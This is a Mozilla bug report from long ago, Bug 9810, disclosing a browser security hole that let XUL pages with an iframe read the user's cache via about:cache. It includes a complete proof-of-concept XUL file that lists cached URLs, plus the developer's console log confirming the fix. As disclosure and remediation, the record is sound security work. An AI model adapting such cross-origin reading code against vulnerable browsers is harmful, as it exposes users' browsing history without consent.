Closed
Bug 9810
Opened 25 years ago
Closed 25 years ago
Reading user's cache using XUL and iframe
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M11
People
(Reporter: joro, Assigned: norrisboyd)
References
Details
There is a security vulnerability in Mozilla 5.0 M7 Win95 (guess all platforms), which allows reading user's cache using XUL and iframe. The code is: ----------------------------------cache2.xul-------------------------- <?xml version="1.0"?> <!-- <?xml-stylesheet href="xul.css" type="text/css"?> --> <!DOCTYPE window> <xul:window xmlns:html="http://www.w3.org/TR/REC-html40" xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" title = "Reading user's cache"> <html:script> <![CDATA[ function dumpCache() { dump("Here are some URLs from your cache:\n"); for(i=0;i<10;i++) dump(window.frames[0].document.links[i].href+"\n"); } ]]> </html:script> <xul:toolbox> <xul:toolbar> <xul:titledbutton value="Press me to dump cache" onclick="dumpCache()" style="background-color:rgb(192,192,192);"/> </xul:toolbar> </xul:toolbox> <html:hr/> <html:iframe type="content-primary" src="about:cache" /> <html:h3> Press the button and look at the apprunner console to see some URLs in your cache. </html:h3> </xul:window> ----------------------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Assignee | ||
Updated•25 years ago
|
Target Milestone: M11
Group: netscapeconfidential?
Component: Browser-General → Security
QA Contact: leger → dshea
Assignee | ||
Updated•25 years ago
|
Assignee | ||
Comment 2•25 years ago
|
||
Fixed. Now we get an error from the URL checks: ->>>>>>>>>>>>>> Write Clipboard to memory ->>>>>>>>>>>>>> Read Clipboard from memory Opening file signon.tbl failed FindShortcut: in='http://prime/gunxul/cache1.xul ' out='null' JavaScript Error: illegal URL method 'about:cache' URL: http://prime/gunxul/cache1.xul LineNo: 4 JavaScript Error: uncaught exception: [Exception... "Failure" code: "-214746725 9" nsresult: "0x80004005 (NS_ERROR_FAILURE)" location: "http://prime/gunxul/cac he1.xul Line: 4"] Document http://prime/gunxul/cache1.xul loaded successfully Document: Done (0.657 secs)
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•